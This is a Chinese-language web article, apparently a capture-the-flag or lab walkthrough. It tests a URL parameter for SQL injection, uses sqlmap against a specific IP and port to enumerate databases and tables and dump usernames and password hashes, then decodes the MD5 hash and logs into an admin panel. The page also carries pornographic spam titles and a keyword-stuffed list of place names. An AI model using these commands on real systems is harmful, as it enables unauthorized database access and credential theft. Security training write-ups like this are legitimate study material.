亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

sqlmap注入的示例分析

發布時間:2021-08-12 09:23:39 來源:億速云 閱讀:111 作者:小新 欄目:開發技術

這篇文章主要介紹sqlmap注入的示例分析,文中介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們一定要看完!

1.發現此網址可能存在sql注入漏洞,我們進行sql盲注入測試一下是否存在漏洞。

地址欄輸入 and 1=1 發現頁面正常顯示。

sqlmap注入的示例分析

再次輸入and 1=2 頁面出現錯誤,說明該頁面可能存在sql注入漏洞

sqlmap注入的示例分析

2.現在拿出我們的kali工具,sqlmap進行注入測試。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs

sqlmap注入的示例分析

3.可以看到存在注入漏洞,掃到了5個數據庫。要獲取管理員用戶密碼,我們可以先從stormgroup注入。查看stormgroup這個數據庫存在的表單

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables

sqlmap注入的示例分析

4.接下來查一下member中存在哪些列。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns

sqlmap注入的示例分析

5.上一步可以看到,name,password 是不是很熟悉。ok接下來我們開始獲取這兩列的數據。

sqlmap注入的示例分析

sqlmap注入的示例分析

6.可以看到password是經過md5加密,接下來我們把他解密。這里推薦給大家我自己收集的多種解密網址:解密網址大全點擊這里

sqlmap注入的示例分析

7.now! 密碼已經呈現在我們眼前!!!!找到后臺地址進行登錄。

sqlmap注入的示例分析

8.END 登錄成功,拿到flag,提交。Gameover !

以上是“sqlmap注入的示例分析”這篇文章的所有內容,感謝各位的閱讀!希望分享的內容對大家有幫助,更多相關知識,歡迎關注億速云行業資訊頻道!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

密山市| 西丰县| 富阳市| 衡山县| 舞阳县| 潮州市| 海阳市| 铜山县| 九龙县| 古蔺县| 肇源县| 澄城县| 胶州市| 中西区| 新兴县| 金阳县| 黔南| 汽车| 虎林市| 茂名市| 峨边| 横山县| 肃北| 泌阳县| 万源市| 景谷| 勐海县| 唐海县| 手游| 石嘴山市| 布尔津县| 察隅县| 林芝县| 蒙阴县| 朝阳市| 深水埗区| 巧家县| 城口县| 大石桥市| 墨玉县| 武汉市|